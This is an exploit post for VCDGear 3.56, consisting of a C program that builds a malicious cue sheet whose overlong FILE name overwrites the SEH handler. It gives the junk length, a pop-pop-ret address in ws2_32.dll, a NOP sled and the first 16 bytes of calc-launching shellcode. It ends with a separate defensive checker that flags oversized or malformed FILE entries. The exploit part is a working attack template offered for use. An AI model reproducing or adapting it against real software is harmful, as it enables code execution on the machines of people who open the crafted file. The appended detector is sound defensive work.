VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit


/* ~~~~~~~~~~~~~~0day~~~~~~~~~~~~~~~~~~
Discovered by: C-W-M
Author: C-W-M ~ Www.MeftunNet.Com & Www.HackerSecurity.Org
Location : Turkey...
Attack Vector: SEH overwrite
Type: Local
Tested on Win2k SP4 (English)

Software: VCDGear v3.56 build 050213

"VCDGear is a program designed to allow a user to extract MPEG streams from CD images, convert VCD files to MPEG,
correct MPEG errors, and more -- all in a single step. Initially developed back in late 1997, the program has
grown to do various extractions, conversions, and corrections on the fly. Cross-platform support will allow
different machines to process and generate output that is compatible between one another."

Total Buf Size: 2512 - [Junk - 324][SEH overwrite - 8][NOP Sled and Shellcode room for - 2180]

Greetz: Ekobar, Poizonb0X, eno7, Doublekickx #pen15
*/

#include <stdio.h>

// Exec Calc.exe Scode (only these first 16 bytes are present on this page)
unsigned char scode[] = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49";

int main(int argc, char *argv[])
{
	FILE *handle;
	int i;

	if(argc < 2) {
		printf("0day VCDGear exploit\n");
		printf("Usage: %s ", argv[0]);
		return 0;
	}

	if(!(handle = fopen(argv[1], "w"))) {
		printf("[+] Error");
		return 0;
	}

	// Cue sheet FILE entry: the quoted file name carries the whole buffer
	fputs("FILE \"", handle);
	for (i=0;i<324;i++) // junk up to the SEH record
		fputs("A", handle);
	fputs("\xeb\x32\x90\x90", handle); // next-SEH field: short jump forward
	fputs("\x3a\x1f\x03\x75", handle); //pop edi, pop esi, retn in ws2_32.dll (English / 5.0.2195.6601)
	for (i=0;i<200;i++) // NOP sled
		fputs("\x90", handle);

	fputs((char *)scode, handle);
	fputs("\" BINARY\n", handle);
	fputs(" TRACK 01 MODE2/2352\n", handle);
	fputs(" INDEX 01 00:00:00\n", handle);
	fclose(handle);
	printf("[+] File successfully created");

	return 0;
}
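
A defender-side check for the malformed input the program above writes, as an added example that is not part of the original advisory: it scans a cue sheet for FILE entries whose name is oversized, contains control bytes, or lacks its closing quote. The 260-byte limit and the flag and function names are assumptions of this example.

```c
#include <stdio.h>

/* Assumed limit (Windows MAX_PATH); the SEH record above sits 324 bytes in. */
#define CUE_MAX_NAME 260
enum { CUE_OK = 0, CUE_LONG_NAME = 1, CUE_CTRL_BYTES = 2, CUE_UNTERMINATED = 4 };

/* Check one cue-sheet line; returns a bitmask of findings for a FILE entry. */
int check_cue_line(const unsigned char *p, size_t len)
{
    size_t i = 0, k, n = 0;
    int flags = CUE_OK, quoted;
    while (i < len && (p[i] == ' ' || p[i] == '\t')) i++;
    if (len - i < 5 || (p[i + 4] != ' ' && p[i + 4] != '\t')) return CUE_OK;
    for (k = 0; k < 4; k++)                  /* keyword, case-insensitive */
        if ((p[i + k] & 0xdf) != "FILE"[k]) return CUE_OK;
    for (i += 4; i < len && (p[i] == ' ' || p[i] == '\t'); i++) ;
    if ((quoted = (i < len && p[i] == '"'))) i++;
    for (; i < len; i++, n++) {              /* walk the file name */
        if (quoted ? p[i] == '"' : (p[i] == ' ' || p[i] == '\t')) break;
        if (p[i] < 0x20 || p[i] == 0x7f) flags |= CUE_CTRL_BYTES;
    }
    if (quoted && i == len) flags |= CUE_UNTERMINATED;
    if (n > CUE_MAX_NAME) flags |= CUE_LONG_NAME;
    return flags;
}

/* Scan a cue sheet held in memory; lines end at LF, a trailing CR is trimmed. */
int scan_cue(const unsigned char *buf, size_t len)
{
    int flags = CUE_OK;
    size_t start = 0, end, l;
    for (; start < len; start = end + 1) {
        for (end = start; end < len && buf[end] != '\n'; end++) ;
        l = end - start;
        if (l && buf[start + l - 1] == '\r') l--;
        flags |= check_cue_line(buf + start, l);
    }
    return flags;
}

int main(int argc, char **argv)
{
    static unsigned char buf[1 << 16];       /* cue sheets are small text files */
    FILE *f = argc > 1 ? fopen(argv[1], "rb") : NULL;
    size_t n = f ? fread(buf, 1, sizeof buf, f) : 0;
    if (f) fclose(f);
    printf("findings: %d (0 = clean)\n", scan_cue(buf, n));
    return 0;
}
```

Bytes above 0x7e are deliberately not flagged, since legitimate file names may be non-ASCII; the length check is the primary signal.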
